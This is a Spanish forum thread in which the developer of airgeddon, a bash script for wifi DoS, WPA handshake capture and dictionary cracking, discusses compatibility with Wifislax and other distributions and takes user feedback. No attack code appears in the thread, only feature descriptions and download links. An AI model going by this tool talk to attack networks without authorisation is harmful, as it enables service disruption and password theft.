Seguridad Wireless - Wifi

Suite Seguridad Wireless => Colaboracion y desarrollo de nuestras lives => Mensaje iniciado por: v1s1t0r en 20-03-2016, 10:52 (Domingo)

Título: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-03-2016, 10:52 (Domingo)
Hola, acabo de registrarme en el foro. un admin me dijo por mail que si quería colaborar pusiese un post aquí.

He desarrollado en bash un script para realizar ataques sobre redes wifi. Me gustaría saber si tiene cabida en wifislax para la próxima release (si lo creen suficientemente bueno, que creo que lo es). Es un script tipo "airstorm" pero desde mi punto de vista mejor. Más automatizado, con mejor presencia (más bonito), con soporte multiidioma (inglés y español por ahora), con exploración del vecindario wifi para seleccionar los objetivos, control de errores en todos los inputs, etc.

Lo he publicado en github donde se puede ver el código fuente y descargarlo. https://github.com/v1s1t0r1sh3r3/airgeddon

Voy a descargar la iso de desarrollo para testearlo en ella por si hubiese cambiado la salida de algún comando que pudiera hacer que no funcionase bien y hago unas pruebas.

Ya me dirán si les gusta y si es digno de entrar en wifislax!. yo por si a caso ya os puse en los créditos  ;D . Gracias.
Título: Re: Script DoS en bash, airgeddon
Publicado por: Torpedo en 21-03-2016, 22:56 (Lunes)


Vamos a limpiar el tema si os parece.

Para deciros cualquier cosa referente a la aplicacionmejor por privado , y sobre consultas sobre legalidad o demás para eso hay un admin al que consultar.

Consultas o respuestas de tipo técnico por favor compañeros.

Gracias.

Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 22-03-2016, 10:10 (Martes)
si quieres que sea lo maximo compatible posible ...

si existe el fichero wifislax-version , entonces airmon-ng = airmon-zc

con esa simple variable jugarias igaul en todo los sistemas.

if [ -f /etc/wifislax-version ]; then

...........

o bien miras si existe airmon-zc  ,,,  si no existe entonces airmon-ng = airmon-ng

en wifislax el airmon-ng actual esta renombrado a airmon-zc

todo esto ahora mismo esta en debate , ... y puede que en el futuro no sea asi , asi que me centraria en mirar para wifislax actual de 32bits o probar en la de 32 de desarrollo.

la de 64bits esta todo en el aire..y es marear para nada.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2016, 10:44 (Martes)
Hola USUARIONUEVO. Ya estoy trabajando en ello. Ya se detectaba si era wifislax o Kali linux (que son las dos distros con las que he comenzado a trabajar), para tratar la salida de manera distinta y ya era funcionante 100% en estas dos distros. Esto que comentas no lo sabía... lo de "airmon-zc". Gracias por el consejo así lo haré.

No obstante, ayer por la noche precisamente subí unos cambios en los que si no se detecta wifislax o kali, se haga un chequeo individual de si están instaladas todas las herramientas que el script usa y que si es que sí, te deje continuar independientemente de que la distro sea una de las 100% compatibles soportadas. Creo que con eso se abre su uso a bastante más gente. Pero haré las modificaciones que indicas. Muchas gracias.
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 22-03-2016, 11:13 (Martes)
la idea es que al ejecutar airmon-ng en kali y wifislax no tendras la misma salida, y entonces necesitas mas comprobaciones y variables.. es mas facil si cuando ejecutas airmon-ng la salida es siempre la misma, de hecho en cualquier otra distro la salida sera igual a kali ..por iusar airmon-ng nuevo.

es mejor mirar si existe airmon-zc y entonces usar ese... si no existe pues airmon-ng ya que sera el original.

solo wifislax tiene dos airmon..asi es es facil unir todo a una.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2016, 11:15 (Martes)
Ya he implementado los cambios que comentabas. Están subidos ya. Ahora $airmon="airmon-zc" para wifislax y listo!! aunque yo sigo detectando si es wifislax por el uname, en vez de por el fichero que comentas... aunque supongo que da igual.

Bueno, todo esto si cambiase, pues lo modifico y ya está. La idea es que el proyecto esté vivo y se adapte perfectamente a nuevas releases o lo que haga falta.

No obstante, tengo un "problema" en el código... a ver si a algún gurú se le ocurre como solucionarlo... sigo teniendo que hacer la distinción de Wifislax y tratarla de forma especial además de por el airmon (que eso ya está solucionado)... porque en wifislax el comando iwconfig se comporta de forma distinta. Si tu haces "iwconfig eth0" (hay que elegir un interfaz que no sea wifi para la prueba), en otras distros la salida del comando iwconfig no es un "0" que suele significar "todo correcto". Sale otro número que supuestamente denota un error. Así suelo saber si hay una tarjeta wifi seleccionada o no... pero en wifislax si haces "iwconfig eth0" sí que sale un "0" como que todo está ok. No se si será por la versión de iwconfig o que ocurre exactamente.

Ahora mismo lo he subsanado de una forma un poco "ñapa". En la funcion check_interface_mode que está sobre la línea 573 se puede ver. Para wifilax le hago además un grep de algo de texto que suele aparecer y así si que consigo que si no aparece el texto me salga una salida que no sea un "0". A ver si a alguien se le ocurre algo mejor, aunque funciona 100%, pero no queda muy "bonito" en el código... igual en otra release de wifislax eso cambia, no lo se. Lo testearé con la nueva distro de desarrollo que tenéis y os digo.

Saludos.
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 22-03-2016, 11:30 (Martes)
no , ... no debes asumir siempre que si es wifislax..use airmon-zc ....


comprueba que existe .... es lo mejor.

en la de 64 no existira , ...
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2016, 11:56 (Martes)
Hecho! ahora si es wifislax, se detecta si existe airmon-zc... si existe se cambia para usarlo y si no nada, se usa el airmon-ng normal y corriente.

Gracias por los consejos!
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2016, 12:01 (Martes)
Respecto a la salida de iwconfig que es distinta que en kali y en otras distros... veo al hacer "iwconfig --version" que en wifislax se usa Wireless-Tools version 29 y en las otras distros ireless-Tools version 30. He probado en la de desarrollo y también se usa la 29.

bueno, mientras esto sea así, lo fixeo como comentaba en otro post, haciendo la "ñapilla" esa... USUARIONUEVO, ¿sabes qué versión habrá en la futura de 64bits o es pronto para decirlo? gracias.
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 22-03-2016, 12:17 (Martes)
wireless-tools si no cambia sera la misma ...

ya que en slackware son muy reacios a poner la 30 por que pone pre beta o algo asi.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 25-03-2016, 20:07 (Viernes)
Hola USUARIONUEVO y otros habitantes del planeta tierra...

el script sigue su evolución. Gracias a un colaborador (kcdtv, que no se si anda por este foro también), ya está traducido al francés. Además de muchos cambios que realicé para ampliar la compatibilidad. Ahora están soportadas otras distros de linux de pentesting como backbox, blackarch o parrot por ejemplo. Ya se detecta automáticamente la versión de las wireless-tools y se usa de la forma que corresponde, igual que con el airmon. Por cierto, hay otra distro que tiene airmon-zc además de wifislax... me sorprendí cuando lo vi. Es la Backbox linux, que es otra distro de pentesting.

Ahora estoy trabajando en unos cambios para autodetectar el idioma del sistema y auto seleccionarlo al inicio si es uno de los soportados.

Cuando acabe todas las mejoras estructurales y de código, igual me lío la manta a la cabeza y modifico la funcionalidad del script para que todo el tema de DoS quede como un submenú y le añado más funcionalidades... ¿alguna sugerencia?

Gracias!
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 25-03-2016, 20:11 (Viernes)
de momento me mantengo a la espera , aun no he querido hacer nada ,por que se que al principio de un proyecto hay muchisimo movimiento , y es una locura actualizar un script 5 o 6 veces por dia.

creo que te comentaron algo del tipo , para capturar handshakes ...estaria bien.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 26-03-2016, 14:12 (Sábado)
Jejeje, tampoco es que esté subiendo 5 subidas al día... pero 1 o 2 casi que sí... tienes razón, ahora estoy con muchos cambios porque lo he cogido con muchas ganas. Se que tenéis una release muy inminente y que igual es precipitado, aunque la versión que hay justo ahora en github (v2.32) es muy estable y compatible y funciona a la perfección para DoS.

La idea es hacer que sea multifunción, y que el DoS quede como submenú. Quizá poner algunas opciones para capturar handshakes... para desencriptar claves wifi... no se, herramientas en general para auditorías wifi. Ya veré en función de lo que se me complique y si veo que puedo hacerlo todo con bash.

Seguiremos informando!
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 27-03-2016, 16:12 (Domingo)
Alguien dijo por ahí una vez de traducirlo al catalán. Bueno, pues ya está hecho. Gracias a la colaboración de un amigo. Lo comento para que no se pegue la curra nadie si ya está hecho. Está en github https://github.com/v1s1t0r1sh3r3/airgeddon (https://github.com/v1s1t0r1sh3r3/airgeddon)
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 08-04-2016, 21:32 (Viernes)
Hola gente, he vuelto a la carga con el script... en muy breve voy a hacer una subida al branch q hice en github y supongo que la pullearé al master, porq ya es oficial... el script ya no es solo de DoS. Ahora permite captura de handshakes de una forma muy facil y cómoda. Estoy ya con las cadenas de texto de las traducciones, q me están ayudando mis contactos y en muy breve os aviso por aquí y a ver si alguien se anima a hacer un testing, aunq creo q está bastante probado... pero bueno, siempre salen cosas. Luego queda mucho q mejorar por supuesto, tengo algunas ideas...

seguiré informando. Saludos!
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 09-04-2016, 21:54 (Sábado)
He probado un poco ,lo que hay en github , (ultimo commit de hace 13 dias)


Esto esta muy muy mal enfocado ...

Pudiendo poner Escanear para buscar objetivos  , o escanear en busca de aps , ...o simple y llanamente

Explorar para buscar objetivos...

Pero asi NO

(http://oi66.tinypic.com/awx3fa.jpg)



A la espera de la version extendida   ;D y por favor , cambia eso.
Se que es solo una chorrada , pero duele a la vista. (a mi al menos) , incita a tocar lo que no es nuestro , que despues lo hagan o no es otra cosa, pero no incitar.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 10-04-2016, 13:52 (Domingo)
Oido cocina... modificado queda todo los mensajes referentes a esto que comentas. En la próxima subida estará ya todo eso modificado.

Sigo a la espera de la revisión de las frases por parte de mis traductores... no se si subirlo y si luego hay q corregir alguna frase hacer otra subida, porq esto me "quema" en las manos... y quiero seguir desarrollando...
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 10-04-2016, 14:35 (Domingo)
Lo dicho, lo he subido todo al branch... voy a seguir haciendo algunas modificaciones,  seguiré trabajando sobre el branch y cuando tenga los strings de idioma corregidos los subiré y ya pasaré todo al master. No obstante, si alguien quiere ir echando un ojo, lo tiene en el branch "NotOnlyDoS".

Saludos.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 16-04-2016, 13:26 (Sábado)
Ale, ya terminé todo lo que tenía a medias del script. Hice el merge del branch al master. Se puede decir que el script está en una versión bastante estable  (v3.11) que incluye:

-Modo monitor-managed switcher
-DoS con diferentes métodos
-Captura de Handshakes asistida
-Limpieza de ficheros de Handshake
-Compatibilidad 100% con Wifislax, Kali, Backbox, Parrot y Blackarch
-Compatibilidad probada con Debian y Ubuntu tras instalar las herramientas que el script necesita (chequeo incluido)
-Opción de conservar modo monitor al salir y si no, restauración de procesos cerrados anteriormente (solo si fue necesario cerrarlos)
-Soporte multilenguaje: inglés, español, catalán y francés
-Consejos de utilización en cada sección

Os dejo el link directo a la descarga: https://github.com/v1s1t0r1sh3r3/airgeddon/archive/master.zip (https://github.com/v1s1t0r1sh3r3/airgeddon/archive/master.zip)

A ver si alguien de por aquí se anima a usarlo y me da algo de feedback!! gracias!!
Título: Re: Script DoS en bash, airgeddon
Publicado por: sanson en 17-04-2016, 00:43 (Domingo)
Hola

Como recomendación,  lo ideal es que al cerrar reinicie procesos y detenga mono monitor.    Así evitarás problemas con otros script .


Cuando sales  ,  cerrar y reiniciar driver



Saludos
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 17-04-2016, 01:02 (Domingo)
Cuando sales  ,  cerrar y reiniciar driver

drivers mejor no .. los procesos si.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 17-04-2016, 01:04 (Domingo)
Hola, hice que al salir te pregunte lo que quieres hacer. Pensé que igual había alguien que podía querer usar el script solo para poner la tarjeta en modo monitor y salir.

No obstante, cuando eliges al salir dejar todo como estaba, además de poner el modo managed en la tarjeta se relanza network-manager para dejar todo como estaba teniendo en cuenta de si hizo falta matar los procesos anteriormente o no. Porque ya hay distros como Kali 2016 o Parrot que no necesitan matar los procesos con el famoso check kill para poner el modo monitor. Estoy intentando que sea compatible con tantos linux como me sea posible, y por supuesto wifislax está entre ellos.

Gracias y saludos!!
Título: Re: Re: Script DoS en bash, airgeddon
Publicado por: sanson en 17-04-2016, 01:07 (Domingo)
Cuando sales  ,  cerrar y reiniciar driver

drivers mejor no .. los procesos si.
En realidad drivers como tal no toca cierto es.  Me refería  matar proceso
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 17-04-2016, 01:20 (Domingo)
check kill , viene de aircrack.

debe funcionar en todas las distros siempre y cuando tenmgas aircrack instalado.


ten en cuenta que es un poco agresivo , ya que mata todo lo que pueda molestarel ,

dhcp
wpa_supplicant

gestor de red ,etc.


nosotros no somos muy partidarios de usar algo omo check kill ... ya que puedes estar conectado por ethernet ...descargando algo , y lo  vas aperder  ;D


no se exactamente como hace geminis_demon , ... el lo que hace es tras elegir interface , mira si esa interface tiene salida a internet  (esta conectada al ap) , si es asi ...dice que no puede actuar mientras estes conectado y la aplicacion se cierra.

es menos agresivo , y el usuario sabe el por que ...se desconecta y ya esta.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 17-04-2016, 01:34 (Domingo)
Estuve haciendo pruebas, y en el caso de wifislax, si estás conectado por cable con otro interfaz, no se te corta la conexión con lo que hice en mi script. El único caso en el que se cortaría sería si estás conectado por una interfaz wifi que usa network manager ya que al hacer check kill es como comentas, se "fusila" todo lo que pueda dar conflicto incluyendo este network manager que gestiona la conexión por wifi a una red. Los que como yo usamos wifislax en una máquina virtual, aunque estemos con wifi, la tarjeta si es integrada (no usb) nos la detecta como ethernet y tampoco le afecta el check kill, con lo que creo que así está bastante minimizado. Igual se podría mejorar aún más como comentáis pero no se, habría que abrir un branch específico para este asunto, se admiten aportes y programadores dispuestos!! jeje.

Pero bueno, creo que la aproximación que hice está bastante bien. Al menos de momento. Voy a seguir trabajando en el script para meter otras opciones. Lo siguiente que haré será meter otro submenú para el desencriptado de claves offline contra un fichero previamente capturado que contenga el handshake.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 17-04-2016, 15:40 (Domingo)
Hola, estoy desarrollando la parte de desencriptar claves offline sobre un fichero capturado. Estoy primero con el ataque de diccionario... pero independientemente de mi script, me estoy encontrando con que algunos ficheros de handshake capturados, tras pasarlos por el wpaclean, se "corrompen"... y dejan de funcionar. Por supuesto no es cosa de mi script, es el propio wpaclean.

He hecho muchas pruebas con varios ficheros y no es siempre, pero muchas veces, tras hacerle el wpaclean al fichero, este se queda en 24bytes y luego cuando lanzas un aircrack basado en bssid, te dice que no encuentra el bssid en dicho fichero. Ya había oido que el wpaclean daba problemas a veces, pero no sabía que era tan exagerado... hoy me ha pasado en 5 de 6 ficheros con los que probé. Así que me estoy planteando hasta quitarlo del script y por supuesto quitar la opción que hace que tras capturarlo te pregunte si quires limpiarlo directamente... ¿qué opinais?

:(
Título: Re: Script DoS en bash, airgeddon
Publicado por: sanson en 17-04-2016, 17:15 (Domingo)
Hola

No hagas repost.  Si depuesto de tu último comentario no ha respondido nadie.   Edita el anterior añadiendo lo necesario


Saludos
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 17-04-2016, 20:01 (Domingo)
Ok disculpad. Así lo haré sobre lo del repost.

Y respecto al wpaclean... a menos q a alguien se le ocurra algo... creo que lo quitaré al menos de que se haga automáticamente tras la captura. También añadiré un "hint" avisando de que no es infalible y recomendando hacer un backup del fichero antes de limpiarlo porque a veces se pueden corromper los ficheros.
Título: Re: Script DoS en bash, airgeddon
Publicado por: ferlan en 17-04-2016, 22:30 (Domingo)

... me estoy encontrando con que algunos ficheros de handshake capturados, tras pasarlos por el wpaclean, se "corrompen"... y dejan de funcionar. Por supuesto no es cosa de mi script, es el propio wpaclean.

He hecho muchas pruebas con varios ficheros y no es siempre, pero muchas veces, tras hacerle el wpaclean al fichero, este se queda en 24bytes y luego cuando lanzas un aircrack basado en bssid, te dice que no encuentra el bssid en dicho fichero.


Un poco raro. Yo, en su día, hice las pruebas a manubrio con los comandos de aircrack-ng, obteniendo el handsake de mi propia red, limpiándolo con wpaclean y pasándole un pequeño diccionario creado también a manubrio para tal fin, y no me falló nunca.

Por cierto, el handsake obtenido mediante tu script, si en lugar de limpiarlo desde el mismo, lo limpio aparte con el comando wpaclean directamente, no presenta ningún problema, así que tú mismo, si sigues pensando en culpabilidades...

Mi opinión personal, y sin que te vayas a molestar por ello, es que puesto que según dices estás aprendiendo bash, no deberías tener prisas y centrarte más en el script y en cómo superar las dificultades que presenta que en lo que hace el script en sí mismo, pues al fin y al cabo, la rueda ya está inventada...

Y no pienses que es que no te quiero ayudar, es que yo, de programación, no voy mucho más allá de "Hola, ¿cuál es tu nombre?"  ;D
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 17-04-2016, 22:36 (Domingo)
el script al inicio ... "si hay internet" ... podria mirar si en githu hay version mas nueva, y autoactualizarse.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 17-04-2016, 23:30 (Domingo)
vaya... buenas sugerencias... lo de autoactualizarse mola! ya lo implementaré!... me ha gustado!!!

no os preocupeis, que no me molesta. la gente puede opinar, para eso pedí opinión no? respecto a lo del wpaclean creo que ya tengo claro lo que ocurre. mi comando es sencillo "wpaclean <out.cap> <in.cap>" y se lanza igual en el script que cuando lo lanzas fuera. no es cosa del script, lo que ocurre es que los ficheros .cap que el script captura ya está filtrado por bssid y canal. debe ser que wpaclean es para limpiar ficheros más "toscos" o que no tengan filtro... si lo ejecutas sobre un .cap generado ya con filtro, las probabilidades de fallo son mucho más altas. A esta conclusión he llegado tras las pruebas y tras la ayuda de otras personas en otro foro donde también hablamos sobre el script. USUARIONUEVO está en dicho foro también y lo sabe, que está en todos los fregaos por lo q veo! jejeje.

Ok, pues lo dicho, ahora q se por qué ocurre, simplemente no "obligaré" a limpiar ningún fichero. Está la opción en el menú por si alguien quiere usarlo por supuesto, pero como el script coge ficheros ya filtrados pues no es necesario forzarlo, de hecho es peor forzarlo.

Graaaaaaaaacias a todos por los comentarios y sugerencias!
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 22-04-2016, 20:06 (Viernes)
Released la versión 3.21... que además de usar aircrack sobre ficheros de handshake capturados se autoactualiza!!

https://github.com/v1s1t0r1sh3r3/airgeddon/archive/master.zip (https://github.com/v1s1t0r1sh3r3/airgeddon/archive/master.zip)

yeah!!!  8)

P.D. No me flameeis por repost! supongo q no se considera repost si ha pasado mucho tiempo y nadie puso nada... es que si no, no se como os puedo avisar de las nuevas versiones... si hago un edit no os "salta" que hay mensaje no?
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 26-04-2016, 22:09 (Martes)
la iso de desarrollo ,

--> networkmanager 1.2.0

es decir , ya no se mete con las interfaces monitor y no necesitamos matarlo , ni blacklistear interfaces ni nada de nada.
Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 28-04-2016, 19:52 (Jueves)
Genial!! gracias por avisar... descargando la nueva iso. Haré como con la kali 2016.1, una excepción para que ya no matemos ningún proceso ni nada. Para que con la versión actual de wifislax siga matando los procesos supongo que podré averiguar de alguna manera que versión de wifislax es... yo suelo usar el uname -a y de ahí extraigo datos... pero también recuerdo que comentásteis en algún momento algo sobre un fichero /etc/wifislax-version o algo así... lo miraré para que funcione ok en ambas (en la actual matando procesos y en la nueva ya no).

Una duda... en esta versión tampoco veo hashcat instalado de base. Está instalado hashcat_script_gui que por lo que he visto es para GPU, y esto sí viene de base... es un poco raro ¿no? lo digo porque viene de base y necesita hashcat para funcionar pero hashcat no viene de base instalado. Se que hay un módulo para ponerlo, pero sería genial tenerlo instalado de serie ya que como sabéis es una herramienta muy potente y se me han ocurrido un par de ideas para usarlo en mi script. No se si este tipo de peticiones habría que hacerlas en algún post concreto, imagino que sí. Algo vi por ahí... bueno, disculpas de antemano. Lo busco y si encuentro un sitio formal para sugerirlo pues lo haré ahí ahora.

Saludetes!  :D
Título: Re: Script DoS en bash, airgeddon
Publicado por: USUARIONUEVO en 28-04-2016, 20:53 (Jueves)
Código: [Seleccionar]
/etc/wifislax-version

queda muy poco para reléase nueva..no te vale la pena mirar si es 4.11.1

Título: Re: Script DoS en bash, airgeddon
Publicado por: v1s1t0r en 28-04-2016, 21:41 (Jueves)
No te preocupes si ya lo tengo listo... lo que he hecho es desglosar el número de la versión por un lado en 4 y luego el "sub-version" que puede ser 11 o 12-dev o lo que sea... como si es 35.

Para versiones menores de 4 (q no se si habrá) directamente q mate procesos... y para la version 4 ya chequela a "sub-version"... y si es 11 o menos pues mata procesos y si es 12 o mas ya no los mata... y por supuesto el "por defecto" es que ya no los mate, con lo que solo los matará si cumple alguna de las anteriores q dije y ya no habrá que tocarlo más para el futuro... bueno, q esto así explicado es un lío, ya lo verás en código y funcionando cuando lo suba, pero vamos que está todo controlado y que va a funcionar 100%... lo que pasa es que estaba con otro desarrollo y ya los subiré juntos. tardaré un par de días que ando liado.

a ver que os parece lo que estoy haciendo (aunque a wifislax no le afecta... por ahora...):
cuando se ejecuta en una distro no reconocida, o reconocida pero q no suele llevar todas las herramientas que el script necesita (debian o ubuntu por ejemplo), antes chequeaba todas las herramientas para ver si las tenías instaladas y si no tenías alguna te avisaba y no te dejaba continuar... bien, pues esto es una ))))) si por ejemplo solo te falta yo que se... wpaclean, pues no poder usar el script porque te falte wpaclean que se usa en un submenú de un submenú y de pascuas a ramos, pues es una ****da. así que ahora estoy dividiendo las tools que el script necesita en "essential_tools" y "optional_tools".

Por supuesto si no tienes todas las "essential_tools" no te dejará seguir avisándote de lo que te falta y demás... pero mi intención es que si te faltase una "optional_tool", pues que te avise, que te recomiende instalarla pero que te deje seguir, y luego controlar por supuesto para que no puedas usar la caracteristica concreta del script que la utiliza.

Es que como va creciendo la cosa, pues así al menos se podrá usar para algo concreto que a alguien le interese sin tener que estar instalando todo lo que el script pueda usar en un momento dado... y comentaba que no le afecta a wifislax con el "de momento" resaltado porque por ahora wifislax tiene instalado de base todo lo que usa el script, pero si mañana por ejemplo meto algo que wifislax no llevase instalado de serie como por ejemplo hashcat, pues que así los usuarios de wifislax lo puedan usar (todo menos esa caracteristica) sin tener que andar instalando nada...

perdonad por el tochako escrito! saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: juanitoa6 en 17-05-2016, 00:06 (Martes)
Buenas compañeros, como puedo probar esta betta de airgeddon?  Abri linux y descomprimo y ejecuto alli? Gracias!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-05-2016, 20:23 (Martes)
Hola, te descargas el zip del master de aquí: https://github.com/v1s1t0r1sh3r3/airgeddon (https://github.com/v1s1t0r1sh3r3/airgeddon) , descomprimes y ejecutas con "bash /ruta/al/airgeddon.sh" o en el caso de wifislax también funciona "sh /ruta/al/airgeddon.sh"

Saludos!

Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 16:04 (Sábado)
Hola USUARIONUEVO y el resto! ... estaba poniéndole una animación ascii al script para que al arrancar tuviera alguna chorrada y estoy teniendo problemas con la misma pero solo en wifislax. Me funciona bien en kali, centos, suse, etc... investigando un poco, parece ser porque en mi animación utilizo:

- Save cursor position:
  \033[s
- Restore cursor position:
  \033[u

Y al parecer esto no está disponible en todos los terminales. Solo en xterm y en nxterm. Si desde wifislax lanzo un comando xterm y abro un terminal de esta forma, sí que me funciona bien la animación ascii...

mi pregunta es, ¿qué terminal usa wifislax? ¿alguien sabe como podría hacer con el terminal por defecto de wifislax algo parecido que el uso de \033[s y \033[u ? gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 16:21 (Sábado)
Imagino estas en kde, asi que abres   konsole  , y en opciones de configuración hay una que pone tipo de consola...creo que estaba en "Linux"  ..prueba a poner xterm.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 21:17 (Sábado)
si perdona, uso kde y konsole... simplemente porque es lo que sale por defecto. Bueno, no encuentro la opción para cambiarlo pero aunque la encontrase... estoy jodido ya que si meto la animación, no le va a funcionar a la mayoría de usuarios que tendrán las opciones por defecto... no se, voy investigar a ver si hay alguna manera de saber en que tipo de consola estás para ver si puedo detectarlo y poner la animación solo si estás en un terminal que lo soporte... no se si se podrá hacer algo así.

gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 21:37 (Sábado)
editar perfil  ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 22:13 (Sábado)
llámame paquete... pero en "editar perfil" no veo ninguna opción para cambiar el tipo de terminal... no obstante, no me sirve. Necesitaría que le funcionase la animación a todo el mundo sin tener que tocar nada de configuración... así que de momento he quitado la animación.

Acabo de subir la version 3.33 que ya mete algunas cosas chulas como lo de controlar tu version de network manager y demas... pero sobre todo, corrige un bug que había al lanzar el script usando ruta absoluta... que tras descargarse una nueva versión y relanzarse, fallaba por el $0... y eso lo he visto al lanzarlo desde el icono de la iso de desarrollo. Menos mal que lo he probado a tiempo. No me había dado cuenta porque siempre uso ruta relativa para lanzar el script... pero está claro que no se puede uno confiar y hay que probarlo TODO!

Este bug sí que es importante. quiero decir, que sí que necesitaría que se actualizase en la iso de desarrollo para que tenga esta v3.33 porque si no, va a ser un problema para los usuarios... les dará error siempre al iniciar el script cuando haya una versión nueva.

Y respecto a lo de meter la animación chula que he hecho del platillo volante al inicio... Es muy curioso porque si haces un echo $TERM dice que es xterm... pero no es verdad. No se muy bien que tipo de terminal es el Konsole por defecto. El caso es que si lanzas un xterm ya sí que funciona en la ventana que se abre... es curioso. ¿No se podría cambiar el tipo de terminal por defecto para que funcionase esto? jeje, igual es mucho liar para una chorrada... bueno, seguiré investigando...

gracias y saludos.

Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 22:37 (Sábado)
A peticion tuya   PAKETON ¡¡¡¡

preferencias --> editar perfil actual --> entorno

Aunque esta en xterm ...puedes probar a cambiarlo por "Linux"
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 22:52 (Sábado)
jejeje, q jodío! vale, ya lo he encontrado... pero nada. tanto con el valor xterm como con Linux sigue sin rular la animación... y como te comentaba, aunq hubiera funcionado... no me vale. Necesitaría que funcionasen los \033[s y \033[u sin tener q andar urgando... lo que no entiendo bien es que tipo de consola truquera es el puto Konsole este... porque aunq ponga en $TERM que es xterm, ya te digo yo que no es un xterm... voy a probar por curiosidad el wifislax con otra cosa que no sea KDE que la verdad es que nunca lo he visto.

Si quieres te paso la beta de la 3.34 con la animación y lo ves tu mismo  :-[
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:08 (Sábado)
NO LO HE PROBADO ..intenta


Código: [Seleccionar]
${SHELL:-bash}
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:09 (Sábado)
si quieres copia/pega solo el code de la animacion ...y pruebo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:12 (Sábado)
/root/.bashrc


contiene esto ..que igual te esta jodiendo ...


Código: [Seleccionar]
# I had problems using 'eval tset' instead of 'TERM=', but you might want to
# try it anyway. I think with the right /etc/termcap it would work great.
# eval `tset -sQ "$TERM"`
if [ "$TERM" = "" -o "$TERM" = "unknown" ]; then
 TERM=linux
fi
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 23:15 (Sábado)
no, parece que $TERM dice xterm por la configuración que tiene Konsole... así que como es xterm y no unknown, eso no le afecta...

bueno, te he pasado por privado la beta con la animación. pruebalo, verás como no va... y si lanzas un xterm verás como sí funciona.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:16 (Sábado)
pues acabo de probar en la iso de 64bits y el platillo sube y baja como si volara....


no me jodas que juegas con wifislax-4.11.1 ?¿ ..es una manzana podrida.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 23:17 (Sábado)
estoy con la iso de desarrollo que es la 4.12 que es donde me has incluido el script... y justo fui a probarlo y sorpresa!!!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:19 (Sábado)
estoy con la iso de desarrollo que es la 4.12 que es donde me has incluido el script... y justo fui a probarlo y sorpresa!!!

a ver si es por el fichero desktop


abro konsole , lo arrastro dentro ..ejecuto , el paltillo vuela unos 5 o 6 ssegundos pasando estrellas...y ya inicia el script en si.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:21 (Sábado)
intentando actualizarse el solo p.... peta zeta

Código: [Seleccionar]
/usr/bin/airgeddon.sh: línea 3351: /root//usr/bin/airgeddon.sh: No existe el fichero o el directorio

lo pongo a mano en la ruta y prubo lanzarlo desde el desktop


el platillo vuela....

asi que si es que algo esta mal, es en la de 32 bits ...voy a arrancarla y probar.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:26 (Sábado)
El mio vuela.... 

¿le has puesto gasolina?   ;D




Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:32 (Sábado)
32 bits  liveusb , tambien vuela ...  asi que ...

EXPORT_PROBLEM=you      ;D

de cachondeo vamos  ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 23:35 (Sábado)
